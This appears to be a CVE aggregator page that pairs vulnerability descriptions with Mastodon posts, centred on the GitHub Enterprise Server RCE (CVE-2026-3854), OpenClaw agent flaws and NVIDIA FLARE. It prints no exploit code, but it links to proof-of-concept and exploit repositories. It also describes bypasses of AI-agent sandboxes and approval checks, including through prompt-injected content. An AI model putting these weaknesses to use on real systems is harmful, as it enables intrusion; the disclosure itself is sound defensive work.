- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-7289
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:25:44.987000

1 posts

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-28T23:38:03.000Z ##

🟠 CVE-2026-7289 - High (8.8)

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7288
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:25:44.987000

1 posts

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-28T23:28:00.000Z ##

🟠 CVE-2026-7288 - High (8.8)

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-38651
(8.2 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:23:20.703000

1 posts

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network, gaining access to sensitive information

thehackerwire@mastodon.social at 2026-04-28T22:34:34.000Z ##

🟠 CVE-2026-38651 - High (8.2)

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7279
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:22:38.260000

1 posts

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads the DLL.

thehackerwire@mastodon.social at 2026-04-29T01:00:07.000Z ##

🟠 CVE-2026-7279 - High (7.8)

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67223
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T20:18:13.020000

1 posts

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtual paths of uploaded files and bypass access controls to download sensitive documents containing PII.

1 repos

https://github.com/brandonperezlara/CVE-2025-67223

thehackerwire@mastodon.social at 2026-04-29T00:15:55.000Z ##

🟠 CVE-2025-67223 - High (7.5)

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40976
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-04-28T20:11:56.713000

1 posts

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the a

beyondmachines1@infosec.exchange at 2026-04-29T09:01:29.000Z ##

Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws

Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.

**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-24186
(8.8 HIGH)

EPSS: 0.06%

updated 2026-04-28T20:10:42.070000

2 posts

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

thehackerwire@mastodon.social at 2026-04-28T22:33:32.000Z ##

🟠 CVE-2026-24186 - High (8.8)

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24178
(9.8 CRITICAL)

EPSS: 0.14%

updated 2026-04-28T20:10:42.070000

2 posts

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to privilege escalation, data tampering, information disclosure, code execution, and denial of service.

thehackerwire@mastodon.social at 2026-04-28T22:33:22.000Z ##

🔴 CVE-2026-24178 - Critical (9.8)

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24204
(6.5 MEDIUM)

EPSS: 0.04%

updated 2026-04-28T20:10:42.070000

1 posts

NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Improper Input Validation by path traversing. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-3893
(9.4 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T20:10:23.367000

1 posts

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

thehackerwire@mastodon.social at 2026-04-28T22:31:41.000Z ##

🔴 CVE-2026-3893 - Critical (9.4)

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41384
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace configs to inject arbitrary environment variables into the backend process spawning, enabling code execution or sensitive data exposure.

thehackerwire@mastodon.social at 2026-04-28T22:30:33.000Z ##

🟠 CVE-2026-41384 - High (7.8)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41383
(8.1 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can manipulate these OpenShell config paths to cause mirror sync operations to delete unintended remote directory contents and replace them with uploaded worksp

thehackerwire@mastodon.social at 2026-04-28T22:00:22.000Z ##

🟠 CVE-2026-41383 - High (8.1)

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41394
(8.2 HIGH)

EPSS: 0.05%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime actions intended for authorized operators.

thehackerwire@mastodon.social at 2026-04-28T22:00:01.000Z ##

🟠 CVE-2026-41394 - High (8.2)

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41396
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by overriding the bundled plugin trust root directory.

thehackerwire@mastodon.social at 2026-04-28T21:49:48.000Z ##

🟠 CVE-2026-41396 - High (7.8)

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41912
(7.6 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access restricted resources.

thehackerwire@mastodon.social at 2026-04-28T21:14:03.000Z ##

🟠 CVE-2026-41912 - High (7.6)

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42426
(8.8 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attackers with operator.write permissions can bypass pairing approval restrictions to gain unauthorized access to exec-capable nodes.

thehackerwire@mastodon.social at 2026-04-28T21:02:23.000Z ##

🟠 CVE-2026-42426 - High (8.8)

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42423
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that should require explicit user approval, circumventing the intended security boundary.

thehackerwire@mastodon.social at 2026-04-28T21:00:33.000Z ##

🟠 CVE-2026-42423 - High (7.5)

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42431
(8.1 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guard and modify browser configurations.

thehackerwire@mastodon.social at 2026-04-28T21:00:05.000Z ##

🟠 CVE-2026-42431 - High (8.1)

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40473
(8.8 HIGH)

EPSS: 0.11%

updated 2026-04-28T19:43:05.663000

1 posts

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted seria

1 repos

https://github.com/dinosn/apache-camel

Matchbook3469@mastodon.social at 2026-04-29T23:29:05.000Z ##

🟠 New security advisory:

CVE-2026-40473 affects multiple systems.

• Impact: Significant security breach potential
• Risk: Unauthorized access or data exposure
• Mitigation: Apply patches within 24-48 hours

Full breakdown:
yazoul.net/advisory/cve/cve-20

#InfoSec #VulnerabilityManagement #CyberSec

##

CVE-2026-3854
(8.8 HIGH)

EPSS: 0.35%

updated 2026-04-28T19:37:39.507000

30 posts

An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance. During a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. Because the internal header format used a delim

4 repos

https://github.com/5kr1pt/CVE-2026-3854

https://github.com/LACHHAB-Anas/Exploit_CVE-2026-3854

https://github.com/lysophavin18/CVE-2026-3854-PoC

https://github.com/simondankelmann/cve-2026-3854-test

bortzmeyer@mastodon.gougere.fr at 2026-04-30T11:52:29.000Z ##

@ben @jpmens Yes,; executing commands with parameters given by the user, without any escaping. wiz.io/blog/github-rce-vulnera

##

mastokukei@social.josko.org at 2026-04-30T09:02:02.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- **AI coding tools and controversies**: Discussions on Claude Code deleting databases, GitHub Copilot’s usage-based billing, and AI-generated code ownership debates.
- **GitHub reliability and alternatives**: Criticism of GitHub’s frequent outages, security vulnerabilities (e.g., CVE-2026-31431, CVE-2026-3854), and migrations to alternatives like [1/3]

##

mackuba@martianbase.net at 2026-04-29T20:47:26.000Z ##

Uh… this seems bad wiz.io/blog/github-rce-vulnera

##

bortzmeyer@mastodon.gougere.fr at 2026-04-30T11:52:29.000Z ##

@ben @jpmens Yes,; executing commands with parameters given by the user, without any escaping. wiz.io/blog/github-rce-vulnera

##

mackuba@martianbase.net at 2026-04-29T20:47:26.000Z ##

Uh… this seems bad wiz.io/blog/github-rce-vulnera

##

CuratedHackerNews@mastodon.social at 2026-04-29T16:21:04.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

beyondmachines1@infosec.exchange at 2026-04-29T15:01:43.000Z ##

GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server

GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.

**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

nixCraft@mastodon.social at 2026-04-29T14:31:29.000Z ##

With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance nvd.nist.gov/vuln/detail/CVE-2

##

F30@chaos.social at 2026-04-29T11:58:04.000Z ##

"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
wiz.io/blog/github-rce-vulnera

##

tisba@ruby.social at 2026-04-29T10:11:40.000Z ##

Aside from the abysimal uptime Github currently presents, they -also- had one of the worst security incidents you can think of: An RCE via a simple “git push” with total loss of tenant isolation (via wiz.io/blog/github-rce-vulnera).

If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.

I am afraid this is just the beginning. #github #security

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Cette faille GitHub est exploitable par un simple Git Push (CVE-2026-3854) it-connect.fr/cette-faille-git #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub

##

hnbest@mastodon.social at 2026-04-29T08:00:02.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

offseq@infosec.exchange at 2026-04-29T07:30:27.000Z ##

⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. radar.offseq.com/threat/critic #OffSeq #GitHub #Infosec

##

hn250@social.lansky.name at 2026-04-29T02:10:12.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

wwahammy@treehouse.systems at 2026-04-29T01:20:29.000Z ##

There should be a "but the service is never up to be exploited" reducer on the CVE score.
wiz.io/blog/github-rce-vulnera

##

jschauma@mstdn.social at 2026-04-29T00:36:54.000Z ##

Question about the GitHub RCE:

wiz.io/blog/github-rce-vulnera says GHES patches were _released_ on 03/10.

github.blog/security/securing- says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".

So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?

##

obivan@infosec.exchange at 2026-04-28T21:53:56.000Z ##

Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) wiz.io/blog/github-rce-vulnera

##

hackersnews@mastodon.cesium.pw at 2026-04-28T20:30:11.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
news.ycombinator.com/item?id=4

#hackernews #tech

##

lobsters@mastodon.social at 2026-04-28T19:55:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown lobste.rs/s/8fxgx7 #security #vibecoding
wiz.io/blog/github-rce-vulnera

##

hn100@social.lansky.name at 2026-04-28T19:45:08.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-28T19:00:06.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-28T19:00:10.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: wiz.io/blog/github-rce-vulnera
Comments: news.ycombinator.com/item?id=4

##

Xavier@infosec.exchange at 2026-04-28T18:59:08.000Z ##

@GossiTheDog Here's a non-Twitter link: wiz.io/blog/github-rce-vulnera

##

blainsmith@fosstodon.org at 2026-04-28T18:58:41.000Z ##

HAHAHAHAHHAHAHAHAHAHAH wiz.io/blog/github-rce-vulnera

##

GossiTheDog@cyberplace.social at 2026-04-28T18:56:22.000Z ##

Wiz got RCE on the cloud version of Github.com and access to every customer environment.

To do this they just reversed the on prem version and found a simple vuln.

wiz.io/blog/github-rce-vulnera

##

hackerworkspace@infosec.exchange at 2026-04-28T18:27:48.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog

wiz.io/blog/github-rce-vulnera

Read on HackerWorkspace: hackerworkspace.com/article/gi

#aisecurity #vulnerability #exploit

##

ngate@mastodon.social at 2026-04-28T18:23:21.000Z ##

🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
wiz.io/blog/github-rce-vulnera #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated

##

h4ckernews@mastodon.social at 2026-04-28T18:23:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec

##

CuratedHackerNews@mastodon.social at 2026-04-28T17:35:05.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

bortzmeyer@mastodon.gougere.fr at 2026-04-28T16:53:20.000Z ##

Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».

Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.

Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.

wiz.io/blog/github-rce-vulnera

##

CVE-2026-7320
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-28T18:31:36

1 posts

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:12.000Z ##

🟠 CVE-2026-7320 - High (7.5)

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42432(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-04-28T18:30:39

1 posts

## Impact Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement. A previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service bounda

thehackerwire@mastodon.social at 2026-04-28T21:00:16.000Z ##

🟠 CVE-2026-42432 - High (7.8)

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42422(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-28T18:28:01

1 posts

## Impact OpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing. Device token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Pa

thehackerwire@mastodon.social at 2026-04-28T21:13:45.000Z ##

🟠 CVE-2026-42422 - High (8.8)

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41914(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:26:36

1 posts

## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. QQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - A

thehackerwire@mastodon.social at 2026-04-28T21:02:34.000Z ##

🟠 CVE-2026-41914 - High (8.5)

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41405(CVSS UNKNOWN)

EPSS: 0.14%

updated 2026-04-28T18:24:06

1 posts

## Summary MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped. ## Affected Packages / Versions - Package: `openclaw`

thehackerwire@mastodon.social at 2026-04-28T21:13:54.000Z ##

🟠 CVE-2026-41405 - High (7.5)

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41404(CVSS UNKNOWN)

EPSS: 0.07%

updated 2026-04-28T18:23:43

1 posts

## Summary Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode ## Current Maintainer Triage - Normalized severity: high - Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased. ## Affected Packages / Versio

thehackerwire@mastodon.social at 2026-04-28T21:50:08.000Z ##

🟠 CVE-2026-41404 - High (8.8)

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41399(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-04-28T18:22:28

1 posts

## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget. ## Impact An unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients. ## Affected Component `src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts` #

thehackerwire@mastodon.social at 2026-04-28T21:49:58.000Z ##

🟠 CVE-2026-41399 - High (7.5)

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41395(CVSS UNKNOWN)

